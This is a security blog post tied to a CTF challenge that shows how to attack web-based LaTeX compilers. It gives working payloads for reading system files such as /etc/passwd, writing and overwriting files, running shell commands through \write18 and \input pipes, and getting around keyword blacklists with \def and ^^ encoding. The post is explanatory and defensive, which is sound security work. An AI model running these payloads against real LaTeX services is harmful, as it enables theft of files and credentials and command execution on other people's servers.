Hacking with LaTeX

In this blog post I want to outline basic attacks against web-based LaTeX compilers. This topic inspired me to create the Web90 - TexMaker challenge.

TexMaker was a simple website where one could enter LaTeX code and the server would create a PDF file using pdflatex. You'll find similar services on the internet. Unfortunately, user input should never be trusted and LaTeX code is no exception to this rule.

That's because LaTeX is Turing complete, which means that you can write functioning programs with it - I'm still waiting for the first malware written in LaTeX sent as an attachment in phishing mails :)

However, I want to focus on existing ways to read and write arbitrary files and to execute commands with LaTeX. This blog post tries to be an extension to this paper. Some packages like TikZ need to call external programs to work properly. Therefore, pdflatex comes with three operation modes:

-no-shell-escape

Disable the \write18{command} construct, even if it is enabled in the texmf.cnf file.

-shell-restricted

Same as -shell-escape, but limited to a 'safe' set of predefined commands.

-shell-escape

Enable the \write18{command} construct. The command can be any shell command. This construct is normally disallowed for security reasons.

\write18 writes to output stream 18, which pdflatex treats specially: instead of writing the text to a file, it passes it to the shell as a command line.
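
Before trying anything else, it helps to know which of the three modes a compiler is running in. The following is a minimal sketch that relies on the pdfTeX primitive \pdfshellescape (0 = disabled, 1 = fully enabled, 2 = restricted); it assumes the service really uses pdflatex and that you get to see the resulting PDF.

```latex
\documentclass{article}
\begin{document}
% \pdfshellescape is a read-only pdfTeX integer:
% 0 = shell escape disabled, 1 = unrestricted, 2 = restricted.
\ifcase\pdfshellescape
  Shell escape is disabled.%
\or
  Shell escape is fully enabled.%
\or
  Shell escape is restricted.%
\fi
\end{document}
```

The sentence that ends up in the PDF tells you which of the sections below are worth trying.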

You can try all the following examples at papeeria.com. I've notified them of the potential risks and they replied:

Hello Sebastian,
thanks for being pro-active! Yes, we run tex compiler with --shell-escape. However, every compile cycle runs in its own Docker container which is isolated from the host system and from other containers. So, users can do whatever they want, even try to run rm -rf / but the effect of their actions will apply to their one-time container only.

Update (10.03.16, 15:20): I want to clarify that this is not intended to show Papeeria up. I think that their setup with Docker and a non-privileged user is solid. I haven't tried to escape the Docker container, but if you're aware of a way to accomplish this, please email contact [a/t] papeeria dot com.

Reading files

All modes allow arbitrary files to be read from the filesystem. The easiest way is to use \input:

\input{/etc/passwd}

This will load the contents of the /etc/passwd file into the PDF file.

If the target file happens to end with .tex, \include can be used:

\include{password}

This will include password.tex from the current working directory.

If the above commands are filtered or blocked by a blacklist, the following workarounds can be used. The first one reads only the first line:

\newread\file
\openin\file=/etc/passwd
\read\file to\line
\text{\line}
\closein\file

We create a new \file handle and open the file /etc/passwd for reading. Then we read one line into the \line variable, output it as text (\text, which is provided by amsmath) and finally close the handle.

Usually files have multiple lines and the following code handles that:

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline 
    \text{\fileline}
\repeat
\closein\file

It loops over all lines until it reaches an EOF.
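
The loop above needs amsmath for \text and will stumble over lines that contain LaTeX special characters. Here is a minimal sketch of a more robust variant, assuming the e-TeX primitive \readline is available (it is in pdflatex). The handle name \infile is my own choice and not part of the challenge.

```latex
\documentclass{article}
\usepackage[T1]{fontenc}
\begin{document}
\newread\infile                % hypothetical handle name
\openin\infile=/etc/passwd
\begingroup
\endlinechar=-1 % do not append an end-of-line character to each line read
\loop\unless\ifeof\infile
  % \readline stores the line as plain characters (no special meaning),
  % so characters like _ # $ % \ are harmless when typeset.
  \readline\infile to\fileline
  \noindent\texttt{\fileline}\par
\repeat
\endgroup
\closein\infile
\end{document}
```

Because \readline never interprets the file's content as TeX code, this variant should also work for files that would otherwise abort the compilation.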

What could an attacker do with this?

Read sensitive files (e.g. SSH private keys, configuration files, ...)

Writing files

Another interesting thing is writing data. \openout and \write are ordinary TeX primitives, so this does not depend on \write18; where files may be written is governed by the openout_any setting in texmf.cnf. It can be done with the following set of commands:

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

This writes the string Hello-world into cmd.tex.
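
One detail worth knowing: without \immediate, TeX defers \openout, \write and \closeout until the current page is shipped out. The following sketch, a complete document under the assumption that the compiler may write to its working directory, prefixes each step with \immediate so that the file exists right away and can be read back in the same run.

```latex
\documentclass{article}
\begin{document}
\newwrite\outfile
% \immediate performs each file operation at once
% instead of waiting for the page to be shipped out.
\immediate\openout\outfile=cmd.tex
\immediate\write\outfile{Hello-world}
\immediate\closeout\outfile
% Read the freshly written file back to confirm the write succeeded.
\input{cmd.tex}
\end{document}
```

If the write worked, the PDF contains the string Hello-world.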

What could an attacker do with this?

Delete a file's content by writing nothing to it.
Overwrite files with foreign data (e.g. ~/.ssh/authorized_keys)

Executing commands

Let's get to the most interesting part of this blogpost. This only works with write18 enabled, which means that -shell-escape has to be set.

The simplest way to execute commands is:

\immediate\write18{env}

This runs the env command.

However, the command's output only goes to stdout, i.e. it shows up in the compilation log:

(/usr/share/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg))engine=pdftex
SELFAUTODIR=/usr
SELFAUTOGRANDPARENT=/
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
SELFAUTOPARENT=/
SELFAUTOLOC=/usr/bin
_=/usr/sbin/env
PWD=/var/www/ctf.internetwache.org.local/compile
LANG=de_DE.UTF8
progname=pdflatex
SHLVL=2

But that won't help us if we don't see the compilation log. A way to work around this limitation is to write stdout to a file and read it again:

\immediate\write18{env > output}
\input{output}

Reading the env output back in will most likely throw an error because it contains LaTeX special characters:

(/usr/share/texmf-dist/tex/latex/latexconfig/epstopdf-sys.cfg)) (./test.tex
! Missing $ inserted.
<inserted text> 
                $
l.7 _
     =/usr/sbin/env
? 
! Emergency stop.
<inserted text> 
                $
l.7 _
     =/usr/sbin/env
!  ==> Fatal error occurred, no output PDF file produced!

A workaround for that is to base64 encode the output:

\immediate\write18{env | base64 > test.tex}
\input{test.tex}
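
If base64 is not available on the target, another option is to typeset the output verbatim. This is a minimal sketch, assuming the verbatim package is installed and -shell-escape is set; the file name output.txt is arbitrary.

```latex
\documentclass{article}
\usepackage{verbatim}
\begin{document}
% Run the command and store its output in a file.
\immediate\write18{env > output.txt}
% \verbatiminput typesets the file's content literally,
% so special characters like _ or $ no longer cause errors.
\verbatiminput{output.txt}
\end{document}
```

The advantage over base64 is that the result is readable directly in the PDF without decoding it first.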

You can also let \input read directly from a command's output (note the leading pipe), which does both steps at once:

\input|ls

\input|ls|base64

I don't think that I have to elaborate on how an attacker could do harm by executing commands.

Bypassing blacklists

During the Internetwache CTF 2016, I used the following blacklist:

		if(preg_match("(input|include)", $CONTENT)) {
			echo 'BLACKLISTED commands used';
		} else {

With the newly acquired knowledge you should be able to come up with a bypass. For example this one:

\immediate\write18{ls|base64 > test.txt}
\newread\file
\openin\file=test.txt
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file

We write the command's output to test.txt and read it line-wise.
Okay, cool, but can we bypass the following blacklist?

"(input|include|write18|immediate)"

Yes, we can! We can use \def to bypass the filter and create a temporary file to read the output:

\def \imm {\string\imme}
\def \diate {diate}
\def \eighteen {\string18}
\def \wwrite {\string\write\eighteen}
\def \args {\string{ls |base64> test.tex\string}}
\def \inp {\string\in}
\def \iput {put}
\def \cmd {\string{test.tex\string}}

% First run
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{\imm\diate\wwrite\args}
\write\outfile{\inp\iput\cmd}
\closeout\outfile

% Second run
\newread\file
\openin\file=cmd.tex
\loop\unless\ifeof\file
    \read\file to\fileline 
    \fileline
\repeat
\closein\file
Run1

This time you need to run the compilation twice:

First run: Create the cmd.tex with the actual exploit code.

cmd.tex's content:

\immediate\write18{ls |base64> test.tex}
\input{test.tex}

Second run: Read cmd.tex and execute commands.

This works because expanding \fileline executes whatever line was just read from the temporary cmd.tex file.

If the blacklist does not contain the immediate keyword, you can use the following block to execute and read the output in one run:

% First run
\newwrite\outfile
\immediate\openout\outfile=cmd.tex
\immediate\write\outfile{\imm\diate\wwrite\args}
\immediate\write\outfile{\inp\iput\cmd}
\immediate\closeout\outfile
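
The \def trick is not the only way around a keyword blacklist. As a further sketch (this one was not part of the CTF setup), TeX's ^^ notation can be used: ^^ followed by two lowercase hex digits is replaced by the corresponding character while the source is being read, so the filtered keywords never appear literally in the submitted code.

```latex
\documentclass{article}
\begin{document}
% ^^69 is TeX's hex notation for the character "i" (0x69).
% TeX turns \^^69nput into \input while reading the source,
% but the strings "input", "immediate" and "write18" never appear literally.
\^^69mmediate\wr^^69te18{ls | base64 > test.tex}
\^^69nput{test.tex}
\end{document}
```

A filter that matches on plain strings would have to normalise this notation first, which is one more reason why blacklisting keywords is a losing game.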

Conclusion

This can turn out badly for web-based LaTeX compilers as well as for you. Never compile LaTeX code from an untrusted source.
Another thing you should have learned is that blacklists are bad and one will find a bypass eventually.

-=-

Sebastian Neef - 0day.work
